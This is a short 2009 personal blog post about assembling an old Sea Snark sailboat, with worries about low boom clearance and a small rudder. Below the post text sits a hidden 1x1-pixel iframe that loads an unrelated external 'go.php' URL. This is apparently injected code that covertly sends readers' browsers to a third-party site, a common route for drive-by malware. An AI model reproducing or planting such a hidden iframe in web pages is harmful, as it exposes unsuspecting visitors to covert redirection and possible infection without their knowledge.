Posted by: wrmcnutt | June 11, 2009

A Sailboat: I Haz Wun!


The Ugliest Sea Snark That's Almost Afloat

The Ugliest Sea Snark That's Almost Afloat

Well, here she is, the ugliest Sea Snark almost afloat.  All I have to do now is add water. 

I do have a couple of technical concerns, though.  Notice how the boom isn’t parallel with the hull?  The helmsman is only going to have about 20 inches to duck the boom when it comes about.  I predict that I will be lifting the boom over my head a lot.  I’m not as flexible as I used to be.  I think I can fix it by moving the fixture on the boom farther forward.  There’s room in the sail slot.

Also, hard as it to believe, this vessel may share something with the Titanic: not enough rudder.  Now that I see it assembled, I seem to recollect that the original rudder was larger. 

But never mind.  She’s in good enough shape to put in the water.

[iframe width=”1″ height=”1″ src=”http://s6g.info/go.php?sid=1″%5D

Leave a Reply

Categories

